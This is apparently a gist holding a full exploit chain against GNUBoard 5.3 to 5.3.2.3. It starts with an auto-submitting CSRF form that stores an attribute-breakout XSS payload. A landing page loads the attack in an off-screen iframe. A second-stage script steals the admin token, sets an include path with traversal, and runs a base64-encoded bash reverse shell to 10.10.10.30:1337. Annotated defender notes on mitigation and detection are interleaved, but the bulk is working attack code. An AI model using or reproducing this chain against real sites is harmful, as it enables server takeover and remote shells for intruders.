GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)

Review notes (defender side):
- This page is a cross-site request forgery against adm/sms_admin/form_group_update.php:
  the form carries only fg_no and fg_name (no anti-CSRF token) and is auto-submitted by
  the script below, so it succeeds whenever the visitor holds an admin session for the
  target host.
- The fg_name value closes a quoted attribute and adds onfocus/autofocus, which only works
  if the stored name is later rendered unescaped inside an input attribute on an admin
  page that also has jQuery ($) loaded — TODO confirm against the affected version.
- A CSRF token on admin POST handlers and attribute-escaping of fg_name on output would
  each break this step; SameSite=Lax/Strict session cookies stop the cross-site POST.
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
  <input type='hidden' name='fg_no' value=''>
  <input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
  // Appended after a JS "//" line-comment marker in the payload, so it never executes;
  // presumably only makes each stored value distinct.
  var random = Math.round(Math.random() * 1000000000);
  // Second-stage script fetched from the attacker host (rce.js in this gist).
  var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
  // Attribute-breakout payload: closes value="", adds onfocus + autofocus so the handler
  // fires on page load, then re-opens a value attribute to keep the markup well-formed.
  document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 ';
  // Auto-submit: the victim sees nothing (this page is framed off-screen by index.html).
  document.forms[0].submit();
</script>
<!--
Exploit start

Review note: this is only a landing page. All activity happens in exploit.html, loaded
through the iframe below. The iframe src is relative, i.e. served from the same host as
this page, so framing protections (X-Frame-Options / frame-ancestors) on the target site
are never involved; what has to be rejected is the cross-site POST that exploit.html
sends to the admin handler.
-->
<!doctype html>
<html>
<head>
<title>gnuboard5</title>
</head>
<body>
<h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1>
Date: 2019-01-01<br>
Affected Browsers: Chrome/Firefox/Edge<br>
Affected Version: 5.3 ~ 5.3.2.3<br>
<!-- Hide and load exploit.html: 100x100 frame with no border, positioned far
     off-screen (negative top/left) so the visitor only sees the banner text. -->
<iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe>
</body>
</html>
/*
CSRF -> RCE Script

Review note: this script is the second stage fetched by the stored-XSS payload, so it
runs in the admin's browser on the target origin. That is why the relative URLs below
('../ajax.token.php', '../contentformupdate.php', '../../bbs/content.php') resolve
against the admin area and why same-origin XHR responses are readable.
*/
// Linux Server reverse shell -- Change it to your preferred option
// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' )
// Decoded and piped to bash by the `exe` query parameter built in stage3.
var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc=';
// Filled in by stage1 from the JSON body of ajax.token.php; consumed by stage2.
var ajax_token = '';
// Content-page id (co_id) used in both the stage2 update and the stage3 GET.
var co_id = 'community';
/**
 * Stage 3: send the command to the content page updated in stage2.
 *
 * Builds a GET to ../../bbs/content.php with the module-level co_id and the
 * URL-encoded cmd in an `exe` parameter (`echo <b64>|base64 -d|bash;#`). The
 * response is not read. Note that the global `cmd` is reassigned in place here.
 *
 * Detection: a request to bbs/content.php carrying an `exe` query parameter,
 * or the substring `base64 -d|bash`, is a clear indicator of this chain.
 * Presumably the file included via co_include_head (stage2) evaluates `exe`;
 * not verified here.
 */
function stage3(){
  // Stage3 : Execute command
  cmd = encodeURIComponent(cmd);
  var xhr = new XMLHttpRequest();
  xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true);
  xhr.send(null);
}
/**
 * Stage 2: update the `community` content page so that its head-include points
 * outside the skin directory, then chain into stage3 once the POST completes.
 *
 * Posts to ../contentformupdate.php as application/x-www-form-urlencoded with
 * the token read in stage1 and co_include_head=../plugin/okname/hpcert1.php.
 * `post_data` is assigned without var/let, i.e. it becomes an implicit global.
 *
 * Mitigation notes: the anti-CSRF token is present and valid here — it was
 * fetched same-origin by stage1 — so a token alone does not stop this step once
 * script runs on the admin origin. The value that must be rejected is the
 * co_include_head path containing `..`; restrict it to an allow-list of files
 * under the skin directory (resolve and compare real paths).
 * Detection: an admin POST to contentformupdate.php whose co_include_head or
 * co_include_tail contains `..` or a path outside the skin directory.
 */
function stage2(){
  // Stage2 : upload vulnerable script
  post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg=';
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    // Fires on every state change; only DONE (4) triggers the next stage, and
    // it does so regardless of HTTP status.
    if (xhr.readyState == XMLHttpRequest.DONE) {
      stage3();
    }
  }
  xhr.open('POST', '../contentformupdate.php', true);
  xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  xhr.send(post_data);
}
/**
 * Stage 1: obtain the admin's anti-CSRF token, then chain into stage2.
 *
 * GETs ../ajax.token.php same-origin and extracts the value following
 * `"token":"` from the response text by plain string splitting; it stores the
 * result in the module-level `ajax_token`. The split throws a TypeError if the
 * marker is absent, which halts the chain.
 *
 * Defender note: this is the step that turns a stored XSS into an authenticated
 * request forgery — the token endpoint answers any same-origin XHR, so it offers
 * no protection against script already running in the admin's session. Unusual
 * XHR fetches of ajax.token.php from admin pages (e.g. with a Referer of a
 * non-form page) are a detection signal.
 */
function stage1(){
  // Stage1 : Get admin token
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      // Ad-hoc JSON parsing: take the text between `"token":"` and the next quote.
      ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0];
      stage2();
    }
  }
  xhr.open('GET', '../ajax.token.php', true);
  xhr.send(null);
}
// Start from stage1 — the remaining stages are chained from XHR completion callbacks
// (stage1 -> stage2 -> stage3), so this single call drives the whole sequence.
stage1();